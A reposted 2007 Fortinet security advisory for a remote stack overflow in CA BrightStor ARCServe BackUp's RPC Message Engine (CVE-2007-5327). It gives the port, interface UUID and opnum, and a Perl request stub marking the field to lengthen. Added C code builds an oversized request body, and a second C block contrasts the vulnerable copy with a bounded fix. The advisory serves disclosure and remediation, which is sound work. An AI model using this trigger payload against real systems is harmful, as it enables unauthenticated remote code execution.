SecurityReason.com - Our Reason is Security

Topic: CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability

SecurityAlert: 3218
CVE: CVE-2007-5327
SecurityRisk: High
Remote Exploit: Yes
Local Exploit: No
Exploit Available: No
Credit: cocoruder
Published: 14.10.2007
Affected Software: CA BrightStor ARCServe BackUp R11.5



Advisory Content:

hi full-disclosure,

CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability

by cocoruder of Fortinet Security Research Team

http://ruder.cdut.net

Summary:

A remote stack-based buffer overflow vulnerability exists in the RPC interface of CA BrightStor ARCServe BackUp. An anonymous remote attacker can exploit it to execute arbitrary code on the affected system; no authentication is required.

Affected Software Versions:

CA BrightStor ARCServe BackUp R11.5

Details:

The flaw exists within the CA BrightStor Message Engine due to incorrect handling of RPC requests received on TCP port 6504. The interface is identified by UUID 506b1890-14c8-11d1-bbc3-00805fa6962e, version 1.0; opnum 0x10d specifies the vulnerable operation within this interface.

The IDL of function 0x10d is as follows:

long sub_28EA5F70 (
    [in] handle_t arg_1,
    [in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
    [in][string] char * arg_3,
    [in][string] char * arg_4,
    [in][string] char * arg_5,
    [in][string] char * arg_6,
    [in][string] char * arg_7,
    [in] long arg_8,
    [out][size_is(arg_1)] byte * arg_9
);

The following is a normal (legitimate) stub for this function, written as a Perl string:

my $stub =
"\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x10\x00\x00\x00\x00\x00\x00\x00".   # point1: the victim's computer name
"\x10\x00\x00\x00".
"kkk-49ade5b31c1".
"\x00".
"\x09\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00".   # point2: a string; set it long to trigger the overflow
"Database".
"\x00\x00\x00\x00".
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x00\x00\x00".
"\x1a\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00".
"RemoteDatabaseMachineName".
"\x00\x00\x00".
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x79\x49\x6e\x40\x00\x00\x00";
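The stub above is NDR stub data: each [string] char * argument travels as a conformant varying array, that is a 4-byte max count, a 4-byte offset (0), a 4-byte actual count that includes the terminating NUL, the characters themselves, and zero padding up to the next 4-byte boundary, which is why "Database" (9 bytes with its NUL) is followed by four zero bytes and "RemoteDatabaseMachineName" (26 bytes) by three. The following C encoder is an added example, not part of the advisory or of CA's software; it rebuilds the opnum 0x10d request body from its fields so the counters and padding in the Perl string can be checked against code, and it shows how the body grows when #point2 is lengthened. Field values (the computer name kkk-49ade5b31c1, Database, RemoteDatabaseMachineName, the trailing 0x40) are taken from the stub on this page; the 300-byte string in main is constructed. The captured stub carries three stray bytes (0x79 0x49 0x6e) in the last alignment gap; the encoder writes zeros there, since padding contents are not part of the data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static size_t put_u32le(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)v;
    out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16);
    out[3] = (uint8_t)(v >> 24);
    return 4;
}

/* Wire size of one "[string] char *" argument: max count, offset and actual
 * count (4 bytes each), the characters plus NUL, padding to a 4-byte boundary. */
size_t ndr_string_size(const char *s)
{
    size_t n = strlen(s) + 1;
    return 12 + ((n + 3) & ~(size_t)3);
}

/* Encodes s as a conformant varying char array; returns bytes written,
 * or 0 if cap is too small. */
size_t ndr_encode_string(uint8_t *out, size_t cap, const char *s)
{
    size_t n = strlen(s) + 1;
    size_t total = ndr_string_size(s);
    size_t off = 0;

    if (cap < total)
        return 0;
    off += put_u32le(out + off, (uint32_t)n);   /* max count */
    off += put_u32le(out + off, 0);             /* offset */
    off += put_u32le(out + off, (uint32_t)n);   /* actual count, NUL included */
    memcpy(out + off, s, n);
    memset(out + off + n, 0, total - off - n);  /* alignment padding */
    return total;
}

/* Size of the whole opnum 0x10d request body for the given variable fields. */
size_t stub_size(const char *computer_name, const char *point2)
{
    return 12 + 256                                     /* arg_2 counts + 256 zero bytes */
         + ndr_string_size(computer_name)               /* arg_3, #point1 */
         + ndr_string_size(point2)                      /* arg_4, #point2 */
         + ndr_string_size("")                          /* arg_5 */
         + ndr_string_size("RemoteDatabaseMachineName") /* arg_6 */
         + ndr_string_size("")                          /* arg_7 */
         + 4;                                           /* arg_8 */
}

/* Writes the request body; returns its length, or 0 if cap is too small. */
size_t build_stub(uint8_t *out, size_t cap, const char *computer_name,
                  const char *point2, uint32_t arg_8)
{
    const char *strings[5] = { computer_name, point2, "",
                               "RemoteDatabaseMachineName", "" };
    size_t off = 0;
    int i;

    if (cap < stub_size(computer_name, point2))
        return 0;
    off += put_u32le(out + off, 256);   /* size_is(256) */
    off += put_u32le(out + off, 0);     /* offset */
    off += put_u32le(out + off, 1);     /* length_is(1) */
    memset(out + off, 0, 256);          /* arg_2 payload exactly as the stub carries it */
    off += 256;
    for (i = 0; i < 5; i++)
        off += ndr_encode_string(out + off, cap - off, strings[i]);
    off += put_u32le(out + off, arg_8);
    return off;
}

/* Rebuilds the page's stub and checks offsets a reader can count by hand
 * in the Perl string. Returns 1 when every field lands where expected. */
int stub_selfcheck(void)
{
    uint8_t buf[512];
    size_t len = build_stub(buf, sizeof buf, "kkk-49ade5b31c1", "Database", 0x40);

    return len == 396
        && buf[0] == 0x00 && buf[1] == 0x01                 /* 256 little-endian */
        && buf[268] == 0x10 && buf[276] == 0x10             /* counts for the 16-byte name */
        && memcmp(buf + 280, "kkk-49ade5b31c1", 16) == 0
        && buf[296] == 0x09 && memcmp(buf + 308, "Database", 9) == 0
        && buf[336] == 0x1a
        && memcmp(buf + 348, "RemoteDatabaseMachineName", 26) == 0
        && buf[392] == 0x40;
}

int main(void)
{
    uint8_t buf[1024];
    char longstr[301];                  /* constructed oversized #point2 */

    memset(longstr, 'A', 300);
    longstr[300] = '\0';
    printf("page stub reproduced: %d\n", stub_selfcheck());
    printf("body with 300-byte #point2: %zu bytes\n",
           build_stub(buf, sizeof buf, "kkk-49ade5b31c1", longstr, 0x40));
    return 0;
}
```

Nothing here talks to port 6504; the block only produces the bytes, which is enough to see that the server must read the actual count from the request and then decide for itself how much of the string it copies, which is exactly the decision the disassembly below gets wrong.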

When #point1 is set to the victim's computer name and #point2 to a long string, a stack-based buffer overflow occurs. The vulnerable code is as follows:

.text:25604EF8 lea     edx, [esp+120h+SubKey]
.text:25604EFC push    offset asc_2561E2BC
.text:25604F01 push    edx
.text:25604F02 call    edi             ; lstrcatA
.text:25604F04 lea     eax, [esp+120h+SubKey]
.text:25604F08 push    esi
.text:25604F09 push    eax
.text:25604F0A call    edi             ; lstrcatA ; overflow!
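Both lstrcatA calls above copy until the source NUL and never consult the size of SubKey on the stack; the second appends the request-derived string in esi, the one the advisory's #point2 lengthens, so anything longer than the space left after the fixed prefix overwrites whatever follows the buffer in the frame. The following C is an added illustration, not CA's code: it reproduces the unchecked pattern with strcat as a portable stand-in for lstrcatA and sets a bounded builder beside it. The prefix string and the 256-byte buffer size are assumptions, since the page shows neither the contents of asc_2561E2BC nor the frame layout.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SUBKEY_MAX    256                   /* assumed size of the SubKey stack buffer */
#define SUBKEY_PREFIX "SOFTWARE\\Vendor\\"  /* constructed stand-in for the string at asc_2561E2BC */

/* Vulnerable shape: the two lstrcatA calls, with strcat as stand-in. Nothing
 * measures name against the space left in subkey, so a name longer than
 * SUBKEY_MAX - strlen(SUBKEY_PREFIX) - 1 bytes writes past the buffer.
 * Only ever called with short input in this file. */
void build_subkey_unchecked(char *subkey, const char *name)
{
    subkey[0] = '\0';
    strcat(subkey, SUBKEY_PREFIX);   /* first lstrcatA: fixed prefix */
    strcat(subkey, name);            /* second lstrcatA: overflow when name is long */
}

/* Hardened form: measure first and copy only if the whole result, including
 * the terminating NUL, fits in cap bytes. Returns 0 on success and -1 when
 * the request-derived string is rejected; the caller must treat -1 as a
 * malformed request rather than fall back to a truncated key name. */
int build_subkey_checked(char *subkey, size_t cap, const char *name)
{
    size_t plen = strlen(SUBKEY_PREFIX);
    size_t nlen = strlen(name);

    if (cap == 0 || plen >= cap || nlen > cap - plen - 1)
        return -1;
    memcpy(subkey, SUBKEY_PREFIX, plen);
    memcpy(subkey + plen, name, nlen + 1);   /* copies the NUL as well */
    return 0;
}

/* Builds a name of name_len 'A's (constructed input) and runs it through the
 * checked builder with a SUBKEY_MAX-byte buffer. Returns 1 if accepted,
 * 0 if rejected. */
int subkey_accepts_len(size_t name_len)
{
    char subkey[SUBKEY_MAX];
    char *name = malloc(name_len + 1);
    int rc;

    if (name == NULL)
        return 0;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    rc = build_subkey_checked(subkey, sizeof subkey, name);
    free(name);
    return rc == 0;
}

int main(void)
{
    char subkey[SUBKEY_MAX];

    build_subkey_unchecked(subkey, "kkk-49ade5b31c1");   /* short name: fits */
    printf("unchecked, short name: %s\n", subkey);
    /* With a 16-byte prefix, 239 bytes is the longest name that still fits. */
    printf("checked, 239-byte name accepted: %d\n", subkey_accepts_len(239));
    printf("checked, 240-byte name accepted: %d\n", subkey_accepts_len(240));
    printf("checked, 4096-byte name accepted: %d\n", subkey_accepts_len(4096));
    return 0;
}
```

On Windows the same fix is StringCchCatA from strsafe.h, or snprintf with its return value compared against the buffer size; either way the length check has to happen before the copy, and a string that does not fit should fail the request, because silently truncating a key name derived from an unauthenticated RPC call would just replace the overflow with a different, quieter bug.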

Solution:

CA has released an advisory for this vulnerability, available at:

http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp

The Fortinet advisory can be found at:

http://www.fortiguardcenter.com

CVE Information:

CVE-2007-5327

Disclosure Timeline:

2007.04.11 Vendor notified via email
2007.04.12 Vendor responded
2007.10.11 Final public disclosure

Disclaimer:

Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing.

Fortinet Security Research
secresearch (at) fortinet (dot) com [email concealed]
http://www.fortinet.com

Best Regards,

Haifei Li
hfli (at) fortinet (dot) com [email concealed]
2007-10-11





